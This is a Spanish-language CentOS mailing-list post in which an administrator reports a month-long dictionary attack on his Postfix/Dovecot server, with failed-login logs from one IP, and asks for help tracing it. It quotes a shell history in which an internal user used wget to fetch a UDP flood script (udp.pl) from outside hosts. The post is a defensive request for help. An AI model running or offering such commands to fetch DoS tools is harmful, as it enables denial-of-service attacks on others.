[CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot

Thu, 21 Mar 2013 08:55:37 -0700 

Buenos días a todos de la lista:
Primero que nada les cuento la experiencia que estoy  pasando  con mi servidor 
de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado  que 
el  servidor a las 5:00PM  es atacado/escaneado  o  algo  asi  tratando de 
conectarse al  dovecot especificamente ,les posteo  lo que 
sale...--------------------- pam_unix Begin
------------------------ 

  dovecot:

    Authentication
Failures:

       contacto
rhost=66.142.38.137 : 88 Time(s)

       teste
rhost=66.142.38.137 : 88 Time(s)

       basura
rhost=66.142.38.137 : 65 Time(s)

       renata
rhost=66.142.38.137 : 65 Time(s)

       financeiro
rhost=66.142.38.137 : 64 Time(s)

       biblioteca
rhost=66.142.38.137 : 62 Time(s)

       bodega
rhost=66.142.38.137 : 62 Time(s)

       licita
rhost=66.142.38.137 : 62 Time(s)

       clientes
rhost=66.142.38.137 : 61 Time(s)

       contabilidad
rhost=66.142.38.137 : 59 Time(s)

       estudio
rhost=66.142.38.137 : 59 Time(s)

       mrivera
rhost=66.142.38.137 : 58 Time(s)

       patricio
rhost=66.142.38.137 : 58 Time(s)

       prueba
rhost=66.142.38.137 : 58 Time(s)

       usuario
rhost=66.142.38.137 : 58 Time(s)

       turismo
rhost=66.142.38.137 : 57 Time(s)        ..........       .................      
  ............(hay mas resgisto q no lo pongo  es bastante todos salen de la 
misma ip)        Unknown Entries:

       check pass;
user unknown: 3901 Time(s)
Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot 
o  bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar 
como y  donde se ejecuta, pero  si  averigue que hicieron y  que se bajaron 
para realizar esto.
el cual detallo, yo  uso  un Centos 6.0 64 bits, fue un usuario interno con 
conocimiento basicos de linux ( al menos eso creo ) se conecto  y  hizo eso, 
(lo saque del  history)wget http://y2khom3.evonet.ro/udp.plwget 
www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping 
www.google.com.peps xcd /tmpls -awpasswd mcondeexit
El detalle es que desde ese momento ya tengo  el problema que les comente 
lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? 
espero me puedan alguna señal  de como detectar de donde se ejecuta dicho 
escaneo .si esta en mi server y  siempre se ejecuta a esa hora?? o  es un 
scaneo  externo.
Saludos
Luis Roman

                                          
_______________________________________________
CentOS-es mailing list
[email protected]
http://lists.centos.org/mailman/listinfo/centos-es

Responder a